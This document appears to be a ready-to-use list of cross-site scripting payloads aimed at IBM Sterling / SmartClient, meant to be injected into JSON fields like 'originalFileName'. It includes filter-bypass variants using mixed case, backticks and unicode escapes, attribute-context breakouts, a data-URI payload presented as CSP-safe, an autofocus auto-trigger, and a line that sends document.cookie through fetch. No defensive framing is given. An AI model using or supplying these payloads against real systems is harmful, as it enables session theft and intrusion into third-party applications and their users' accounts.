# ===== IBM Sterling / SmartClient XSS Payloads =====
# Use inside JSON values like:
# "originalFileName":"test<...>"

# ---- BASIC WORKING PAYLOADS ----
test<img src=x onerror=alert(1)>
test<svg/onload=alert(1)>

# ---- LOW-NOISE / FILTER BYPASS ----
test<img src=1 onerror=alert`1`>
test<img src=x oNeRrOr=alert(1)>
test<svg/onload=confirm(1)>

# ---- UNICODE BYPASS (VERY EFFECTIVE) ----
test\u003Cimg src=x onerror=alert(1)\u003E
test\u003Csvg/onload=alert(1)\u003E

# ---- ATTRIBUTE CONTEXT PAYLOADS ----
test" autofocus onfocus=alert(1) x="
test" onmouseover="alert(1)

# ---- DATA URI PAYLOAD (CSP SAFE) ----
test<img src="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'/>">

# ---- AUTO-TRIGGER PAYLOAD ----
test<input autofocus onfocus=alert(1)>

# ---- ADVANCED (SAME-ORIGIN EXFIL) ----
test<img src=x onerror="fetch('/?c='+document.cookie)">

# ===== NOTES =====
# ✔ No <script> tags
# ✔ No broken JSON
# ✔ Works with CSP: unsafe-inline
# ✔ Suitable for SmartClient RPC
